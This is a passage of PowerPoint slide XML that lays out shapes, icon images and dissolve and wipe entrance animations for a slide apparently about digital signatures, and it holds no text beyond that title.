              <a:ext cx="122606" cy="1041287"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941" name="Digital Signatures"/>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Digital Signatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="946" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="866986" y="8477955"/>
            <a:ext cx="1300481" cy="605085"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1300480" cy="605084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="942" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1300481" cy="605085"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="666699"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="2700000">
                <a:srgbClr val="969696"/>
              </a:outerShdw>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="945" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="173397" y="129660"/>
              <a:ext cx="433494" cy="345764"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="433493" cy="345762"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="943" name="Oval"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="433494" cy="345763"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="99CCFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="666699"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="8100000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>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sp>
            <p:nvSpPr>
              <p:cNvPr id="944" name="Shape"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="106567" y="48622"/>
                <a:ext cx="251066" cy="2395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4550" y="8475"/>
                      <a:pt x="0" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10800" y="16200"/>
                      <a:pt x="21600" y="10800"/>
                      <a:pt x="21600" y="10800"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFCC66"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFFFCC"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="8100000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="8100000">
                  <a:srgbClr val="000000"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="l" defTabSz="1300480">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="1300"/>
                  </a:spcBef>
                  <a:defRPr b="1" sz="2800">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="949" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1560124" y="8606649"/>
            <a:ext cx="433494" cy="347698"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="433493" cy="347697"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="947" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="433494" cy="347698"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="666699"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="948" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="131854" y="88735"/>
              <a:ext cx="171592" cy="173850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FFCC66"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFFFCC"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="666699"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="8100000">
                <a:srgbClr val="000000"/>
              </a:outerShdw>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="953" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6982177" y="3258741"/>
            <a:ext cx="1535290" cy="1374268"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1535288" cy="1374267"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="950" name="Notepad_Notepad01" descr="Notepad_Notepad01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="0" y="540147"/>
              <a:ext cx="1535289" cy="834121"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="951" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="385525" y="850898"/>
              <a:ext cx="585781" cy="2098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094"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="553" y="17673"/>
                    <a:pt x="1155" y="17813"/>
                    <a:pt x="1607" y="16971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2411" y="15569"/>
                    <a:pt x="3667" y="11361"/>
                    <a:pt x="3667" y="11361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3516" y="10239"/>
                    <a:pt x="3717" y="7855"/>
                    <a:pt x="3265" y="7855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2813" y="7855"/>
                    <a:pt x="2863" y="10099"/>
                    <a:pt x="2863" y="11361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2863" y="14727"/>
                    <a:pt x="3114" y="18234"/>
                    <a:pt x="3265" y="21600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4873" y="18655"/>
                    <a:pt x="5224" y="17813"/>
                    <a:pt x="5676" y="12483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7836" y="14447"/>
                    <a:pt x="7133" y="11922"/>
                    <a:pt x="8540" y="7855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9996" y="12203"/>
                    <a:pt x="10197" y="13184"/>
                    <a:pt x="11403" y="7855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11654" y="8696"/>
                    <a:pt x="11805" y="10239"/>
                    <a:pt x="12207" y="10239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12709" y="10239"/>
                    <a:pt x="12960" y="8275"/>
                    <a:pt x="13462" y="7855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14517" y="7013"/>
                    <a:pt x="15622" y="7153"/>
                    <a:pt x="16727" y="6732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18887" y="4769"/>
                    <a:pt x="17581" y="6312"/>
                    <a:pt x="20394" y="1122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20746" y="421"/>
                    <a:pt x="21600" y="0"/>
                    <a:pt x="21600" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1300"/>
                </a:spcBef>
                <a:defRPr b="1" sz="2800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="952" name="Pen01" descr="Pen01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="1800000">
              <a:off x="1066664" y="-39102"/>
              <a:ext cx="122606" cy="1041287"/>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909"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="909"/>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906"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="906"/>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1" presetID="22" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="903"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="903"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="913"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="913"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetClass="entr" nodeType="afterEffect" presetSubtype="4" presetID="22" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="910"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(down)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="910"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="940"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="940"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="29" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="893"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="893"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="919"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="919"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetClass="entr" nodeType="afterEffect" presetSubtype="8" presetID="22" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="914"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="914"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="42" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="43" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="953"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="953"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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1" presetID="22" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="923"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="923"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="51" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="52" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="926"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="926"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="55" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="56" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="13" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="933"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="933"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="59" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="60" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="61" presetClass="entr" nodeType="clickEffect" presetID="9" grpId="14" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="62" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="930"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="930"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="64" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="65" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="15" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="927"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="927"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
